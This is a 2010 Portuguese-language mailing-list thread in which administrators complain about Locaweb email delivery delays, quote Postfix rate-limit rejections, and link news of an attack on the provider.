recado...... Segundo o Painel de Controle "Todos os servi?os est?o > funcionando normalmente"... .. mas isso n?o ? verdade. > Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails > enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com > mensagem de erro para o remetente.... O atraso j? ? complicado.... a > sensa??o de estar perdendo e-mails ? pior ainda. -- Atenciosamente / Sincerily, Leonardo Rodrigues Solutti Tecnologia http://www.solutti.com.br Minha armadilha de SPAM, N?O mandem email gertrudes at solutti.com.br My SPAMTRAP, do not email it __ masoch-l list https://eng.registro.br/mailman/listinfo/masoch-l -- Carlos Comercial www.greco.com.br (11) 3040.1000 - S?o Paulo Direto 3040-1001 acesse: blog.greco.com.br Tutoriais - Dicas - Suporte From algorges at gmail.com Fri Sep 17 11:06:44 2010 From: algorges at gmail.com (Alexandre Gorges) Date: Fri, 17 Sep 2010 11:06:44 -0300 Subject: [MASOCH-L] Locaweb - Problemas com E-mails In-Reply-To: <4C936F7E.5010009@bhz.jamef.com.br> Message-ID: Complicado isso, visto que ao mesmo tempo em que recebo muitos emails de clientes importantes, tamb?m recebo muito mais spam dos servidores da Locaweb. Agora quando respondo um email necess?rio, a Locaweb fecha o meu envio! Esse problema est? igual ao que aconteceu um tempo atr?s com o Yahoo. []'s Alexandre Gorges http://www.google.com.br/profiles/algorges MSN/Skype: alexandre at dag.net.br ICQ: 2031408 > From: Rejaine Monteiro > Reply-To: Lista Masoch > Date: Fri, 17 Sep 2010 10:39:10 -0300 > To: Lista Masoch > Subject: Re: [MASOCH-L] Locaweb - Problemas com E-mails > > > Alexandre, > > Exatamente isso que ocorre aqui (diferente da mensagem que postei > anteriormente "too many connections", que foi um outro caso) > A mensagem ? essa mesmo "too many mails, slown down"... > > Tenho v?rios casos desse no log hoje, por exemplo (no caso envio de > e-mail nosso para a clientes locaweb) > > > > Em 17-09-2010 10:22, Alexandre Gorges escreveu: >> Presto servi?o para v?rias empresas, e de 15 dias para c?, enviar emails >> para Locaweb demora muito. >> >> Eu acho que a Locaweb come?ou a usar greylist para frear a entradas dos >> emails. >> Na fila de emails do servidores acusa o seguinte: >> >> (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : >> Recipient address rejected: you are sending too many mails, slow down... (in >> reply to RCPT TO command)) >> (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : >> Recipient address rejected: you are sending too many mails, slow down... (in >> reply to RCPT TO command)) >> >> Os emails ficam na fila de envio por um per?odo muito alto at? ser enviado >> para a Locaweb. >> >> >> []'s >> Alexandre Gorges >> http://www.google.com.br/profiles/algorges >> MSN/Skype: alexandre at dag.net.br >> ICQ: 2031408 >> >> >> >> >> >>> From: Leonardo Rodrigues >>> Reply-To: Lista Masoch >>> Date: Fri, 17 Sep 2010 10:04:32 -0300 >>> To: Lista Masoch >>> Subject: Re: [MASOCH-L] Locaweb - Problemas com E-mails >>> >>> >>> 12 horas pra um email chegar ??? Infelizmente isso tem sido o 'tudo >>> funcionando normalmente' da Locaweb nos ?ltimos tempos. >>> >>> ? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? mais. >>> Problema todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo mais >>> problema do que funcionando normal, n?o tem valido a indica??o mais. >>> >>> Pra hospedar web eu ainda indico. Mas pra email j? deixou de ser >>> uma boa op??o a mais de ano. >>> >>> Em 17/09/2010 09:28, Hideki Nakamura escreveu: >>> >>>> Bom a todos, >>>> Por favor, preciso que algu?m da Locaweb entre em contato comigo pois >>>> estou com s?rios problemas de e-mails a quase 5 dias. Os meios >>>> convencionais de suporte n?o funcionaram. >>>> >>>> A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando conta >>>> do recado...... Segundo o Painel de Controle "Todos os servi?os est?o >>>> funcionando normalmente"... .. mas isso n?o ? verdade. >>>> Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails >>>> enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com >>>> mensagem de erro para o remetente.... O atraso j? ? complicado.... a >>>> sensa??o de estar perdendo e-mails ? pior ainda. >>>> >>> >>> -- >>> >>> >>> Atenciosamente / Sincerily, >>> Leonardo Rodrigues >>> Solutti Tecnologia >>> http://www.solutti.com.br >>> >>> Minha armadilha de SPAM, N?O mandem email >>> gertrudes at solutti.com.br >>> My SPAMTRAP, do not email it >>> >>> >>> >>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l From cleber-listas at inetweb.com.br Fri Sep 17 12:27:34 2010 From: cleber-listas at inetweb.com.br (Cleber @ Listas) Date: Fri, 17 Sep 2010 12:27:34 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails In-Reply-To: References: <4C936760.9040806@solutti.com.br> Message-ID: <000901cb567c$da5e7cf0$8f1b76d0$@inetweb.com.br> Eles criaram o mx.a.locaweb.com.br utilizando o PostFix e aplicaram uma s?rie de regras para o delivery para eles. Muitos dominios novos e antigos apontam para esse MX. Infelizmente, essas regras n?o foram divulgadas no site ou wiki deles. Seria interessante se a Locaweb tivesse uma pagina de postmaster assim como h? no Yahoo, Terra, etc. Abra?os, Cleber -----Mensagem original----- De: masoch-l-bounces at eng.registro.br [mailto:masoch-l-bounces at eng.registro.br] Em nome de Alexandre Gorges Enviada em: sexta-feira, 17 de setembro de 2010 10:22 Para: Lista Masoch Assunto: Re: [MASOCH-L] Locaweb - Problemas com E-mails Presto servi?o para v?rias empresas, e de 15 dias para c?, enviar emails para Locaweb demora muito. Eu acho que a Locaweb come?ou a usar greylist para frear a entradas dos emails. Na fila de emails do servidores acusa o seguinte: (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : Recipient address rejected: you are sending too many mails, slow down... (in reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : Recipient address rejected: you are sending too many mails, slow down... (in reply to RCPT TO command)) Os emails ficam na fila de envio por um per?odo muito alto at? ser enviado para a Locaweb. []'s Alexandre Gorges http://www.google.com.br/profiles/algorges MSN/Skype: alexandre at dag.net.br ICQ: 2031408 > From: Leonardo Rodrigues > Reply-To: Lista Masoch > Date: Fri, 17 Sep 2010 10:04:32 -0300 > To: Lista Masoch > Subject: Re: [MASOCH-L] Locaweb - Problemas com E-mails > > > 12 horas pra um email chegar ??? Infelizmente isso tem sido o > 'tudo funcionando normalmente' da Locaweb nos ?ltimos tempos. > > ? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? mais. > Problema todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo > mais problema do que funcionando normal, n?o tem valido a indica??o mais. > > Pra hospedar web eu ainda indico. Mas pra email j? deixou de ser > uma boa op??o a mais de ano. > > Em 17/09/2010 09:28, Hideki Nakamura escreveu: >> Bom a todos, >> Por favor, preciso que algu?m da Locaweb entre em contato comigo pois >> estou com s?rios problemas de e-mails a quase 5 dias. Os meios >> convencionais de suporte n?o funcionaram. >> >> A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando >> conta do recado...... Segundo o Painel de Controle "Todos os servi?os >> est?o funcionando normalmente"... .. mas isso n?o ? verdade. >> Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails >> enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com >> mensagem de erro para o remetente.... O atraso j? ? complicado.... a >> sensa??o de estar perdendo e-mails ? pior ainda. > > > -- > > > Atenciosamente / Sincerily, > Leonardo Rodrigues > Solutti Tecnologia > http://www.solutti.com.br > > Minha armadilha de SPAM, N?O mandem email gertrudes at solutti.com.br My > SPAMTRAP, do not email it > > > > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l __ masoch-l list https://eng.registro.br/mailman/listinfo/masoch-l From hidekinakamura at gmail.com Fri Sep 17 14:40:00 2010 From: hidekinakamura at gmail.com (Hideki Nakamura) Date: Fri, 17 Sep 2010 14:40:00 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails In-Reply-To: <000901cb567c$da5e7cf0$8f1b76d0$@inetweb.com.br> References: <4C936760.9040806@solutti.com.br> <000901cb567c$da5e7cf0$8f1b76d0$@inetweb.com.br> Message-ID: Parece que o problema foi resolvido (pelo menos no meu caso). Resolvi depois de abrir um chamado para o Ombudsman. Logo que recebi o e-mail dele, os e-mails haviam normalizado. N?o era para ser assim, mas .... paci?ncia. 2010/9/17 Cleber @ Listas : > Eles criaram o mx.a.locaweb.com.br utilizando o PostFix e aplicaram uma > s?rie de regras para o delivery para eles. Muitos dominios novos e antigos > apontam para esse MX. > Infelizmente, essas regras n?o foram divulgadas no site ou wiki deles. > Seria interessante se a Locaweb tivesse uma pagina de postmaster assim como > h? no Yahoo, Terra, etc. > Abra?os, Cleber > > -----Mensagem original----- > De: masoch-l-bounces at eng.registro.br > [mailto:masoch-l-bounces at eng.registro.br] Em nome de Alexandre Gorges > Enviada em: sexta-feira, 17 de setembro de 2010 10:22 > Para: Lista Masoch > Assunto: Re: [MASOCH-L] Locaweb - Problemas com E-mails > > Presto servi?o para v?rias empresas, e de 15 dias para c?, enviar emails > para Locaweb demora muito. > > Eu acho que a Locaweb come?ou a usar greylist para frear a entradas dos > emails. > Na fila de emails do servidores acusa o seguinte: > > (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : > Recipient address rejected: you are sending too many mails, slow down... (in > reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] said: 450 > 4.7.1 : > Recipient address rejected: you are sending too many mails, slow down... (in > reply to RCPT TO command)) > > Os emails ficam na fila de envio por um per?odo muito alto at? ser enviado > para a Locaweb. > > > []'s > Alexandre Gorges > http://www.google.com.br/profiles/algorges > MSN/Skype: alexandre at dag.net.br > ICQ: 2031408 > > > > >> From: Leonardo Rodrigues >> Reply-To: Lista Masoch >> Date: Fri, 17 Sep 2010 10:04:32 -0300 >> To: Lista Masoch >> Subject: Re: [MASOCH-L] Locaweb - Problemas com E-mails >> >> >> ? ? ?12 horas pra um email chegar ??? Infelizmente isso tem sido o >> 'tudo funcionando normalmente' da Locaweb nos ?ltimos tempos. >> >> ? ? ?? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? mais. >> Problema todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo >> mais problema do que funcionando normal, n?o tem valido a indica??o mais. >> >> ? ? ?Pra hospedar web eu ainda indico. Mas pra email j? deixou de ser >> uma boa op??o a mais de ano. >> >> Em 17/09/2010 09:28, Hideki Nakamura escreveu: >>> Bom a todos, >>> Por favor, preciso que algu?m da Locaweb entre em contato comigo pois >>> estou com s?rios problemas de e-mails a quase 5 dias. Os meios >>> convencionais de suporte n?o funcionaram. >>> >>> A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando >>> conta do recado...... Segundo o Painel de Controle "Todos os servi?os >>> est?o funcionando normalmente"... .. mas isso n?o ? verdade. >>> Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails >>> enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com >>> mensagem de erro para o remetente.... O atraso j? ? complicado.... a >>> sensa??o de estar perdendo e-mails ? pior ainda. >> >> >> -- >> >> >> Atenciosamente / Sincerily, >> Leonardo Rodrigues >> Solutti Tecnologia >> http://www.solutti.com.br >> >> Minha armadilha de SPAM, N?O mandem email gertrudes at solutti.com.br My >> SPAMTRAP, do not email it >> >> >> >> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l > > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- < Chinese - Language of God? "Coincid?ncias" entre os ideogramas chineses e a B?blia. http://students.washington.edu/cbsf/cool/Chinese.swf From hidekinakamura at gmail.com Fri Sep 17 18:38:39 2010 From: hidekinakamura at gmail.com (Hideki Nakamura) Date: Fri, 17 Sep 2010 18:38:39 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker Message-ID: http://info.abril.com.br/noticias/internet/locaweb-sofre-ataque-cracker-17092010-33.shl 2010/9/17 Hideki Nakamura : > Parece que o problema foi resolvido (pelo menos no meu caso). Resolvi > depois de abrir um chamado para o Ombudsman. Logo que recebi o e-mail > dele, os e-mails haviam normalizado. N?o era para ser assim, mas .... > paci?ncia. > > > 2010/9/17 Cleber @ Listas : >> Eles criaram o mx.a.locaweb.com.br utilizando o PostFix e aplicaram uma >> s?rie de regras para o delivery para eles. Muitos dominios novos e antigos >> apontam para esse MX. >> Infelizmente, essas regras n?o foram divulgadas no site ou wiki deles. >> Seria interessante se a Locaweb tivesse uma pagina de postmaster assim como >> h? no Yahoo, Terra, etc. >> Abra?os, Cleber >> >> -----Mensagem original----- >> De: masoch-l-bounces at eng.registro.br >> [mailto:masoch-l-bounces at eng.registro.br] Em nome de Alexandre Gorges >> Enviada em: sexta-feira, 17 de setembro de 2010 10:22 >> Para: Lista Masoch >> Assunto: Re: [MASOCH-L] Locaweb - Problemas com E-mails >> >> Presto servi?o para v?rias empresas, e de 15 dias para c?, enviar emails >> para Locaweb demora muito. >> >> Eu acho que a Locaweb come?ou a usar greylist para frear a entradas dos >> emails. >> Na fila de emails do servidores acusa o seguinte: >> >> (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : >> Recipient address rejected: you are sending too many mails, slow down... (in >> reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] said: 450 >> 4.7.1 : >> Recipient address rejected: you are sending too many mails, slow down... (in >> reply to RCPT TO command)) >> >> Os emails ficam na fila de envio por um per?odo muito alto at? ser enviado >> para a Locaweb. >> >> >> []'s >> Alexandre Gorges >> http://www.google.com.br/profiles/algorges >> MSN/Skype: alexandre at dag.net.br >> ICQ: 2031408 >> >> >> >> >>> From: Leonardo Rodrigues >>> Reply-To: Lista Masoch >>> Date: Fri, 17 Sep 2010 10:04:32 -0300 >>> To: Lista Masoch >>> Subject: Re: [MASOCH-L] Locaweb - Problemas com E-mails >>> >>> >>> ? ? ?12 horas pra um email chegar ??? Infelizmente isso tem sido o >>> 'tudo funcionando normalmente' da Locaweb nos ?ltimos tempos. >>> >>> ? ? ?? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? mais. >>> Problema todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo >>> mais problema do que funcionando normal, n?o tem valido a indica??o mais. >>> >>> ? ? ?Pra hospedar web eu ainda indico. Mas pra email j? deixou de ser >>> uma boa op??o a mais de ano. >>> >>> Em 17/09/2010 09:28, Hideki Nakamura escreveu: >>>> Bom a todos, >>>> Por favor, preciso que algu?m da Locaweb entre em contato comigo pois >>>> estou com s?rios problemas de e-mails a quase 5 dias. Os meios >>>> convencionais de suporte n?o funcionaram. >>>> >>>> A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando >>>> conta do recado...... Segundo o Painel de Controle "Todos os servi?os >>>> est?o funcionando normalmente"... .. mas isso n?o ? verdade. >>>> Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails >>>> enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com >>>> mensagem de erro para o remetente.... O atraso j? ? complicado.... a >>>> sensa??o de estar perdendo e-mails ? pior ainda. >>> >>> >>> -- >>> >>> >>> Atenciosamente / Sincerily, >>> Leonardo Rodrigues >>> Solutti Tecnologia >>> http://www.solutti.com.br >>> >>> Minha armadilha de SPAM, N?O mandem email gertrudes at solutti.com.br My >>> SPAMTRAP, do not email it >>> >>> >>> >>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >> >> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > > > > -- > < > > Chinese - Language of God? > "Coincid?ncias" entre os ideogramas chineses e a B?blia. > http://students.washington.edu/cbsf/cool/Chinese.swf > -- < Chinese - Language of God? "Coincid?ncias" entre os ideogramas chineses e a B?blia. http://students.washington.edu/cbsf/cool/Chinese.swf From egbertomonteiro at gmail.com Fri Sep 17 23:56:04 2010 From: egbertomonteiro at gmail.com (egberto) Date: Fri, 17 Sep 2010 23:56:04 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: References: Message-ID: <4C942A44.50104@gmail.com> Acredito que o problema com emails n?o tenha haver com este ataque. On 09/17/2010 06:38 PM, Hideki Nakamura wrote: > http://info.abril.com.br/noticias/internet/locaweb-sofre-ataque-cracker-17092010-33.shl > > > 2010/9/17 Hideki Nakamura: > >> Parece que o problema foi resolvido (pelo menos no meu caso). Resolvi >> depois de abrir um chamado para o Ombudsman. Logo que recebi o e-mail >> dele, os e-mails haviam normalizado. N?o era para ser assim, mas .... >> paci?ncia. >> >> >> 2010/9/17 Cleber @ Listas: >> >>> Eles criaram o mx.a.locaweb.com.br utilizando o PostFix e aplicaram uma >>> s?rie de regras para o delivery para eles. Muitos dominios novos e antigos >>> apontam para esse MX. >>> Infelizmente, essas regras n?o foram divulgadas no site ou wiki deles. >>> Seria interessante se a Locaweb tivesse uma pagina de postmaster assim como >>> h? no Yahoo, Terra, etc. >>> Abra?os, Cleber >>> >>> -----Mensagem original----- >>> De: masoch-l-bounces at eng.registro.br >>> [mailto:masoch-l-bounces at eng.registro.br] Em nome de Alexandre Gorges >>> Enviada em: sexta-feira, 17 de setembro de 2010 10:22 >>> Para: Lista Masoch >>> Assunto: Re: [MASOCH-L] Locaweb - Problemas com E-mails >>> >>> Presto servi?o para v?rias empresas, e de 15 dias para c?, enviar emails >>> para Locaweb demora muito. >>> >>> Eu acho que a Locaweb come?ou a usar greylist para frear a entradas dos >>> emails. >>> Na fila de emails do servidores acusa o seguinte: >>> >>> (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1: >>> Recipient address rejected: you are sending too many mails, slow down... (in >>> reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] said: 450 >>> 4.7.1: >>> Recipient address rejected: you are sending too many mails, slow down... (in >>> reply to RCPT TO command)) >>> >>> Os emails ficam na fila de envio por um per?odo muito alto at? ser enviado >>> para a Locaweb. >>> >>> >>> []'s >>> Alexandre Gorges >>> http://www.google.com.br/profiles/algorges >>> MSN/Skype: alexandre at dag.net.br >>> ICQ: 2031408 >>> >>> >>> >>> >>> >>>> From: Leonardo Rodrigues >>>> Reply-To: Lista Masoch >>>> Date: Fri, 17 Sep 2010 10:04:32 -0300 >>>> To: Lista Masoch >>>> Subject: Re: [MASOCH-L] Locaweb - Problemas com E-mails >>>> >>>> >>>> 12 horas pra um email chegar ??? Infelizmente isso tem sido o >>>> 'tudo funcionando normalmente' da Locaweb nos ?ltimos tempos. >>>> >>>> ? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? mais. >>>> Problema todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo >>>> mais problema do que funcionando normal, n?o tem valido a indica??o mais. >>>> >>>> Pra hospedar web eu ainda indico. Mas pra email j? deixou de ser >>>> uma boa op??o a mais de ano. >>>> >>>> Em 17/09/2010 09:28, Hideki Nakamura escreveu: >>>> >>>>> Bom a todos, >>>>> Por favor, preciso que algu?m da Locaweb entre em contato comigo pois >>>>> estou com s?rios problemas de e-mails a quase 5 dias. Os meios >>>>> convencionais de suporte n?o funcionaram. >>>>> >>>>> A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando >>>>> conta do recado...... Segundo o Painel de Controle "Todos os servi?os >>>>> est?o funcionando normalmente"... .. mas isso n?o ? verdade. >>>>> Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails >>>>> enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com >>>>> mensagem de erro para o remetente.... O atraso j? ? complicado.... a >>>>> sensa??o de estar perdendo e-mails ? pior ainda. >>>>> >>>> >>>> -- >>>> >>>> >>>> Atenciosamente / Sincerily, >>>> Leonardo Rodrigues >>>> Solutti Tecnologia >>>> http://www.solutti.com.br >>>> >>>> Minha armadilha de SPAM, N?O mandem email gertrudes at solutti.com.br My >>>> SPAMTRAP, do not email it >>>> >>>> >>>> >>>> >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >>> >> >> >> -- >> < >> >> Chinese - Language of God? >> "Coincid?ncias" entre os ideogramas chineses e a B?blia. >> http://students.washington.edu/cbsf/cool/Chinese.swf >> >> > > > From zhushazang at yahoo.com.br Sat Sep 18 00:58:03 2010 From: zhushazang at yahoo.com.br (Zhu Sha Zang) Date: Sat, 18 Sep 2010 00:58:03 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: <4C942A44.50104@gmail.com> References: <4C942A44.50104@gmail.com> Message-ID: <4C9438CB.3070405@yahoo.com.br> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Em 17-09-2010 23:56, egberto escreveu: > Acredito que o problema com emails n?o tenha haver com este ataque. > > > > On 09/17/2010 06:38 PM, Hideki Nakamura wrote: >> http://info.abril.com.br/noticias/internet/locaweb-sofre-ataque-cracker-17092010-33.shl >> >> >> >> 2010/9/17 Hideki Nakamura: >> >>> Parece que o problema foi resolvido (pelo menos no meu caso). Resolvi >>> depois de abrir um chamado para o Ombudsman. Logo que recebi o e-mail >>> dele, os e-mails haviam normalizado. N?o era para ser assim, mas .... >>> paci?ncia. >>> >>> >>> 2010/9/17 Cleber @ Listas: >>> >>>> Eles criaram o mx.a.locaweb.com.br utilizando o PostFix e aplicaram uma >>>> s?rie de regras para o delivery para eles. Muitos dominios novos e >>>> antigos >>>> apontam para esse MX. >>>> Infelizmente, essas regras n?o foram divulgadas no site ou wiki deles. >>>> Seria interessante se a Locaweb tivesse uma pagina de postmaster >>>> assim como >>>> h? no Yahoo, Terra, etc. >>>> Abra?os, Cleber >>>> >>>> -----Mensagem original----- >>>> De: masoch-l-bounces at eng.registro.br >>>> [mailto:masoch-l-bounces at eng.registro.br] Em nome de Alexandre Gorges >>>> Enviada em: sexta-feira, 17 de setembro de 2010 10:22 >>>> Para: Lista Masoch >>>> Assunto: Re: [MASOCH-L] Locaweb - Problemas com E-mails >>>> >>>> Presto servi?o para v?rias empresas, e de 15 dias para c?, enviar >>>> emails >>>> para Locaweb demora muito. >>>> >>>> Eu acho que a Locaweb come?ou a usar greylist para frear a entradas dos >>>> emails. >>>> Na fila de emails do servidores acusa o seguinte: >>>> >>>> (host mx.a.locaweb.com.br[186.202.4.42] said: 450 >>>> 4.7.1: >>>> Recipient address rejected: you are sending too many mails, slow >>>> down... (in >>>> reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] >>>> said: 450 >>>> 4.7.1: >>>> Recipient address rejected: you are sending too many mails, slow >>>> down... (in >>>> reply to RCPT TO command)) >>>> >>>> Os emails ficam na fila de envio por um per?odo muito alto at? ser >>>> enviado >>>> para a Locaweb. >>>> >>>> >>>> []'s >>>> Alexandre Gorges >>>> http://www.google.com.br/profiles/algorges >>>> MSN/Skype: alexandre at dag.net.br >>>> ICQ: 2031408 >>>> >>>> >>>> >>>> >>>> >>>>> From: Leonardo Rodrigues >>>>> Reply-To: Lista Masoch >>>>> Date: Fri, 17 Sep 2010 10:04:32 -0300 >>>>> To: Lista Masoch >>>>> Subject: Re: [MASOCH-L] Locaweb - Problemas com E-mails >>>>> >>>>> >>>>> 12 horas pra um email chegar ??? Infelizmente isso tem sido o >>>>> 'tudo funcionando normalmente' da Locaweb nos ?ltimos tempos. >>>>> >>>>> ? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? mais. >>>>> Problema todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo >>>>> mais problema do que funcionando normal, n?o tem valido a indica??o >>>>> mais. >>>>> >>>>> Pra hospedar web eu ainda indico. Mas pra email j? deixou de ser >>>>> uma boa op??o a mais de ano. >>>>> >>>>> Em 17/09/2010 09:28, Hideki Nakamura escreveu: >>>>> >>>>>> Bom a todos, >>>>>> Por favor, preciso que algu?m da Locaweb entre em contato comigo pois >>>>>> estou com s?rios problemas de e-mails a quase 5 dias. Os meios >>>>>> convencionais de suporte n?o funcionaram. >>>>>> >>>>>> A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando >>>>>> conta do recado...... Segundo o Painel de Controle "Todos os servi?os >>>>>> est?o funcionando normalmente"... .. mas isso n?o ? verdade. >>>>>> Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails >>>>>> enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com >>>>>> mensagem de erro para o remetente.... O atraso j? ? complicado.... a >>>>>> sensa??o de estar perdendo e-mails ? pior ainda. >>>>>> >>>>> >>>>> -- >>>>> >>>>> >>>>> Atenciosamente / Sincerily, >>>>> Leonardo Rodrigues >>>>> Solutti Tecnologia >>>>> http://www.solutti.com.br >>>>> >>>>> Minha armadilha de SPAM, N?O mandem email gertrudes at solutti.com.br My >>>>> SPAMTRAP, do not email it >>>>> >>>>> >>>>> >>>>> >>>>> __ >>>>> masoch-l list >>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>> >>>> >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>>> >>> >>> >>> -- >>> < >>> >>> Chinese - Language of God? >>> "Coincid?ncias" entre os ideogramas chineses e a B?blia. >>> http://students.washington.edu/cbsf/cool/Chinese.swf >>> >>> >> >> >> > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > Imagine, coinscid?ncia pura!!!! -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.16 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkyUOMsACgkQ35zeJy7JhCi1AACfRr6CT5PgQxXLGrlfK9BW3yT6 D3QAoIdoahD6ax+HqqwkyG6GhnbeimnX =ENCL -----END PGP SIGNATURE----- From roberto.berto at gmail.com Sat Sep 18 16:59:09 2010 From: roberto.berto at gmail.com (=?UTF-8?Q?Roberto_Bert=C3=B3?=) Date: Sat, 18 Sep 2010 16:59:09 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: <4C9438CB.3070405@yahoo.com.br> References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> Message-ID: Viu pessoal, aproveito para divulgar o workaround e a falha, na segunda parte do artigo tem info de como proteger. Foi bem grave mesmo http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ 2010/9/18 Zhu Sha Zang > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Em 17-09-2010 23:56, egberto escreveu: > > Acredito que o problema com emails n?o tenha haver com este ataque. > > > > > > > > On 09/17/2010 06:38 PM, Hideki Nakamura wrote: > >> > http://info.abril.com.br/noticias/internet/locaweb-sofre-ataque-cracker-17092010-33.shl > >> > >> > >> > >> 2010/9/17 Hideki Nakamura: > >> > >>> Parece que o problema foi resolvido (pelo menos no meu caso). Resolvi > >>> depois de abrir um chamado para o Ombudsman. Logo que recebi o e-mail > >>> dele, os e-mails haviam normalizado. N?o era para ser assim, mas .... > >>> paci?ncia. > >>> > >>> > >>> 2010/9/17 Cleber @ Listas: > >>> > >>>> Eles criaram o mx.a.locaweb.com.br utilizando o PostFix e aplicaram > uma > >>>> s?rie de regras para o delivery para eles. Muitos dominios novos e > >>>> antigos > >>>> apontam para esse MX. > >>>> Infelizmente, essas regras n?o foram divulgadas no site ou wiki deles. > >>>> Seria interessante se a Locaweb tivesse uma pagina de postmaster > >>>> assim como > >>>> h? no Yahoo, Terra, etc. > >>>> Abra?os, Cleber > >>>> > >>>> -----Mensagem original----- > >>>> De: masoch-l-bounces at eng.registro.br > >>>> [mailto:masoch-l-bounces at eng.registro.br] Em nome de Alexandre Gorges > >>>> Enviada em: sexta-feira, 17 de setembro de 2010 10:22 > >>>> Para: Lista Masoch > >>>> Assunto: Re: [MASOCH-L] Locaweb - Problemas com E-mails > >>>> > >>>> Presto servi?o para v?rias empresas, e de 15 dias para c?, enviar > >>>> emails > >>>> para Locaweb demora muito. > >>>> > >>>> Eu acho que a Locaweb come?ou a usar greylist para frear a entradas > dos > >>>> emails. > >>>> Na fila de emails do servidores acusa o seguinte: > >>>> > >>>> (host mx.a.locaweb.com.br[186.202.4.42] said: 450 > >>>> 4.7.1: > >>>> Recipient address rejected: you are sending too many mails, slow > >>>> down... (in > >>>> reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] > >>>> said: 450 > >>>> 4.7.1: > >>>> Recipient address rejected: you are sending too many mails, slow > >>>> down... (in > >>>> reply to RCPT TO command)) > >>>> > >>>> Os emails ficam na fila de envio por um per?odo muito alto at? ser > >>>> enviado > >>>> para a Locaweb. > >>>> > >>>> > >>>> []'s > >>>> Alexandre Gorges > >>>> http://www.google.com.br/profiles/algorges > >>>> MSN/Skype: alexandre at dag.net.br > >>>> ICQ: 2031408 > >>>> > >>>> > >>>> > >>>> > >>>> > >>>>> From: Leonardo Rodrigues > >>>>> Reply-To: Lista Masoch > >>>>> Date: Fri, 17 Sep 2010 10:04:32 -0300 > 